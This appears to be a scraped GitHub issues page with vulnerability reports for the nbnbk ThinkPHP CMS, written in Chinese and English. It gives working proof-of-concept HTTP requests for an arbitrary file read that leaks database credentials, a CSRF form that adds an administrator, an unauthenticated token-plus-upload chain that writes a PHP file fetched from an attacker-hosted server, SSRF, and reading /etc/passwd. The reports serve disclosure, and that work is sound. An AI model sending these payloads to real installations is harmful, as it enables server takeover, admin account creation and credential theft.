fanli2012 / nbnbk Goto Github PK
View Code? Open in Web Editor NEW基于thinkphp5的cms管理系统,B2C电商开源php商城系统平台,tp5开源cms,thinkphp企业网站源码,适合博客、中小企业建站二次开发。
License: Other
基于thinkphp5的cms管理系统,B2C电商开源php商城系统平台,tp5开源cms,thinkphp企业网站源码,适合博客、中小企业建站二次开发。
License: Other
Nbnbk has an arbitrary file read vulnerability
POST /api/Index/getFileBinary HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
url=../application/database.php
通过修改 url
参数来读取文件,来看返回数据。
Return data by modifying the url
parameter to read the file.
HTTP/1.1 200 OK
Date: Fri, 04 Mar 2022 03:39:37 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 2784
Connection: close
Content-Type: text/html; charset=UTF-8
{"code":0,"msg":"操作成功","data":"PD9waHAKLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBUaGlua1BIUCBbIFdFIENBTiBETyBJVCBKVVNU\r\nIFRISU5LIF0KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBDb3B5cmlnaHQgKGMpIDIwMDZ+MjAxNiBo\r\ndHRwOi8vdGhpbmtwaHAuY24gQWxsIHJpZ2h0cyByZXNlcnZlZC4KLy8gKy0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0K\r\nLy8gfCBMaWNlbnNlZCAoIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy9saWNlbnNlcy9MSUNFTlNFLTIu\r\nMCApCi8vICstLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi8vIHwgQXV0aG9yOiBsaXUyMXN0IDxsaXUyMXN0QGdtYWls\r\nLmNvbT4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCi8vIOaVsOaNruW6k+mFjee9ruaWh+S7tgoKcmV0dXJu\r\nIFsKICAgIC8vIOaVsOaNruW6k+exu+WeiwogICAgJ3R5cGUnICAgICAgICAgICA9PiAnbXlzcWwn\r\nLAogICAgLy8g5pyN5Yqh5Zmo5Zyw5Z2ACiAgICAnaG9zdG5hbWUnICAgICAgID0+ICcxMjcuMC4w\r\nLjEnLAogICAgLy8g5pWw5o2u5bqT5ZCNCiAgICAnZGF0YWJhc2UnICAgICAgID0+ICduYm5iaycs\r\nCiAgICAvLyDnlKjmiLflkI0KICAgICd1c2VybmFtZScgICAgICAgPT4gJ3Jvb3QnLAogICAgLy8g\r\n5a+G56CBCiAgICAncGFzc3dvcmQnICAgICAgID0+ICdwYXNzQCExMjMnLAogICAgLy8g56uv5Y+j\r\nCiAgICAnaG9zdHBvcnQnICAgICAgID0+ICc4ODg5JywKICAgIC8vIOi\/nuaOpWRzbgogICAgJ2Rz\r\nbicgICAgICAgICAgICA9PiAnJywKICAgIC8vIOaVsOaNruW6k+i\/nuaOpeWPguaVsAogICAgJ3Bh\r\ncmFtcycgICAgICAgICA9PiBbXSwKICAgIC8vIOaVsOaNruW6k+e8lueggem7mOiupOmHh+eUqHV0\r\nZjgKICAgICdjaGFyc2V0JyAgICAgICAgPT4gJ3V0ZjgnLAogICAgLy8g5pWw5o2u5bqT6KGo5YmN\r\n57yACiAgICAncHJlZml4JyAgICAgICAgID0+ICdmbF8nLAogICAgLy8g5pWw5o2u5bqT6LCD6K+V\r\n5qih5byPCiAgICAnZGVidWcnICAgICAgICAgID0+IGZhbHNlLAogICAgLy8g5pWw5o2u5bqT6YOo\r\n572y5pa55byPOjAg6ZuG5Lit5byPKOWNleS4gOacjeWKoeWZqCksMSDliIbluIPlvI8o5Li75LuO\r\n5pyN5Yqh5ZmoKQogICAgJ2RlcGxveScgICAgICAgICA9PiAwLAogICAgLy8g5pWw5o2u5bqT6K+7\r\n5YaZ5piv5ZCm5YiG56a7IOS4u+S7juW8j+acieaViAogICAgJ3J3X3NlcGFyYXRlJyAgICA9PiBm\r\nYWxzZSwKICAgIC8vIOivu+WGmeWIhuemu+WQjiDkuLvmnI3liqHlmajmlbDph48KICAgICdtYXN0\r\nZXJfbnVtJyAgICAgPT4gMSwKICAgIC8vIOaMh+WumuS7juacjeWKoeWZqOW6j+WPtwogICAgJ3Ns\r\nYXZlX25vJyAgICAgICA9PiAnJywKICAgIC8vIOaYr+WQpuS4peagvOajgOafpeWtl+auteaYr+WQ\r\npuWtmOWcqAogICAgJ2ZpZWxkc19zdHJpY3QnICA9PiB0cnVlLAogICAgLy8g5pWw5o2u6ZuG6L+U\r\n5Zue57G75Z6LIGFycmF5IOaVsOe7hCBjb2xsZWN0aW9uIENvbGxlY3Rpb27lr7nosaEKICAgICdy\r\nZXN1bHRzZXRfdHlwZScgPT4gJ2FycmF5JywKICAgIC8vIOaYr+WQpuiHquWKqOWGmeWFpeaXtumX\r\ntOaIs+Wtl+autQogICAgJ2F1dG9fdGltZXN0YW1wJyA9PiBmYWxzZSwKICAgIC8vIOaYr+WQpumc\r\ngOimgei\/m+ihjFNRTOaAp+iDveWIhuaekAogICAgJ3NxbF9leHBsYWluJyAgICA9PiBmYWxzZSwK\r\nICAgIC8v5Y+W5raI5YmN5Y+w6Ieq5Yqo5qC85byP5YyWCiAgICAnZGF0ZXRpbWVfZm9ybWF0Jz0+\r\nIGZhbHNlLApdOwo=\r\n"}
文件信息在 data
字段中,是 base64
编码的格式,但其中包含了大量的 \r\n
导致我们没法直接解码。我们可以通过 js
去将所有 \r\n
删掉。
The file information in the data
field is in the base64
encoded format, but it contains a large number of \r\n
which prevents us from decoding it directly. We can delete all \r\n'through
js'.
a = "$data string"
a.replaceAll('\r\n', '')
演示将上面代码进行转化
The demonstration transforms the above code
将转化后的数据进行 base64
转码 我使用的是 Google Chrome
插件 FeHelper
Transcoding the converted data base64
I'm using the Google Chrome
Plug-inFeHelper
CSRF Add Background User in nbnbk
该漏洞可以通过 CSRF 的方式,无需知道管理员账号密码进入后台,即可在没有痕迹的添加管理员账户。
漏洞存在版本:default
This vulnerability can be accessed via CSRF to add an administrator account without knowing the administrator account password to the background.
Vulnerability Existing Version: default
Specific implementation
http://nbnbk:8888/fladmin/login
通过打开 /fladmin/login 路径进入后台登陆界面
Enter the background login interface by opening/fladmin/login path
使用默认密码 admin888/123456 进入后台,找到用户管理列表里的 “管理员” 界面中的 “添加管理员” 功能点
Use the default password admin888/123456 to enter the background and find the Add Administrator function point in the Administrator interface in the User Management List
随意输入用户名和密码,点击保存。
Enter your username and password at will and click Save.
在 bp 查看请求数据包,然后通过 bp 生成 CSRF POC 代码。
复制后在本地新建文件,通过 python -m http.server 8099
开启本地的 web 服务。
View the request packet in BP and generate the CSRF POC code from bp.
Create a new file locally after copying, via python-m http. Server 8099
Opens a local web service.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://nbnbk:8888/fladmin/admin/add" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="pwd" value="123456" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="role_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
点击 submit request 提交请求
Click submit request to submit the request
点击后提示添加成功
Hint to add success after clicking
查看我们的请求数据包
View our request packet
Origin 和 referer 是我们自己的服务。CSRF 添加管理员账号报告到此结束。
Origin and referer are our own services. This concludes the CSRF Add Administrator Account report.
Nbnbk has any file upload Getshell
该漏洞无需账号密码即可任意文件上传 Getshell,相当于两步请求直接获取机器权限。
漏洞存在版本:default
This vulnerability allows any file to be uploaded to the Getshell without an account password, which is equivalent to two-step requests for direct access to the machine.
Vulnerability Existing Version: default
文件上传的接口需要 access_token ,我们可以通过下面这个接口获取
Get token
The interface for file upload requires access_ Token, we can get it from this interface
POST /api/login/wx_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close
openid=1&unionid=1&sex=1&head_img=1&nickname=1
可以在返回包中发现 token 已经生成
You can find that token has been generated in the return package
HTTP/1.1 200 OK
Date: Wed, 02 Mar 2022 01:37:25 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 831
Connection: close
Content-Type: text/html; charset=UTF-8
{"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}
Start HTTP service in VPS
echo '<?php phpinfo();' > index.php
python -m http.server 8099
File Upload
POST /api/User/download_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
access_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php
这里的 access_token 就是上面获取的 token,url 是文件地址,path 是文件名
Access_here Token is the token obtained above, URL is the file address, path is the file name.
返回 200 表示成功,我们直接访问 http://nbnbk:8888/info.php 可以看到已经写入文件并能成功解析。
Back to 200 means success, we visit directly http://nbnbk:8888/info.php You can see that the file has been written and parsed successfully.
Vulnerability Analysis
Discover danger function
通过全局搜索 fopen
这个打开文件的函数,发现了 api 下面存在一个 path
用变量来控制,极有肯能存在问题。
By searching fopen
, an open file function globally, we found that there is a path
under the API that is controlled by variables, which is probably problematic.
双击后可以发现是一个 download_img 的函数,其中 url
和 path
变量是可控的。
Double-click to find a download_ Function of img where url
and path
variables are controllable.
这里直接使用 curl 访问了我们提供的 url
并且 path
也没有做任何过滤。直接读文件写到指定目录。
Curl is used directly here to access the url'we provided and
path` does not filter at all. Read the file directly to the specified directory.
直接构造路近请求但是提示 token
错误,下一步我们需要获得 token
。
Construct the approach request directly but prompt token
error, we need to get token
next.
Get token
看源码可以知道,一定是要登陆才能调用到 getToken
。可以通过注册登陆的方式来获取,但是如果关闭了注册功能、注册功能失效,我们就没法获取 token
了。有没有不需要有账号密码即可获取 token
的方式?
我们继续来看登陆功能的 Login.php
发现提供了一种不需要账号密码就可以登陆的方式。
Looking at the source code, you know that you must be logged in to call getToken'. It can be obtained by registering for login, but if the registration function is turned off and the registration function is invalid, we will not be able to get
token'. Is there a way to get `token'without an account password?
Let's move on to Login'for login functionality. Php
Discovery provides a way to log in without an account password.
进一步跟进 wxLogin
函数
Follow Up wxLogin
Function
token
1.The collapse function contains a check of the input content, which probably means that the user does not exist and can create a new one, which we can ignore here.
2.New `token'will be generated after passing the check
我们直接构造数据包,填入需要的字段即可直接拿到生成的 token
。到这里分析就结束了。
We construct the data package directly and fill in the required fields to get the generated token
. The analysis is over here.
SSRF vulnerability in nbnbk
该漏洞可以伪装服务器发送请求,但没有回显,危害较小,可以做为 DDOS 使用。
漏洞存在版本:default
This bug can disguise the server from sending requests, but it does not echo and is less harmful and can be used as a DDOS.
Vulnerability Existing Version: default
POST /api/Image/curl_upload_image HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
url=http://127.0.0.1:8088&file[tmp_name]=1&file[type]=1&file[name]=1
替换 url
来进行 SSRF
攻击,该漏洞没有回显。发送请求后可以看到服务器已经向外请求了。
Replace url
for `SSRF'attack, the vulnerability is not echoed. After sending the request, you can see that the server has already made an outgoing request.
A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.
Vulnerable code in /application/api/controller/Index.php
/**
* 文件转Base64二进制流
* @param $url 网络文件路径,绝对地址
* @return string
*/
public function getFileBinary()
{
$str = file_get_contents($_REQUEST['url']);
Util::echo_json(ReturnData::create(ReturnData::SUCCESS,chunk_split(base64_encode($str))));
}
Vulnerability PoC
GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close
The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.
A remote attacker can also read arbitrary file information from the target system.
PoC
GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close
After decoding the data field of the HTTP response body in base64, you can get the specific content of the file (/etc/passwd
)
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.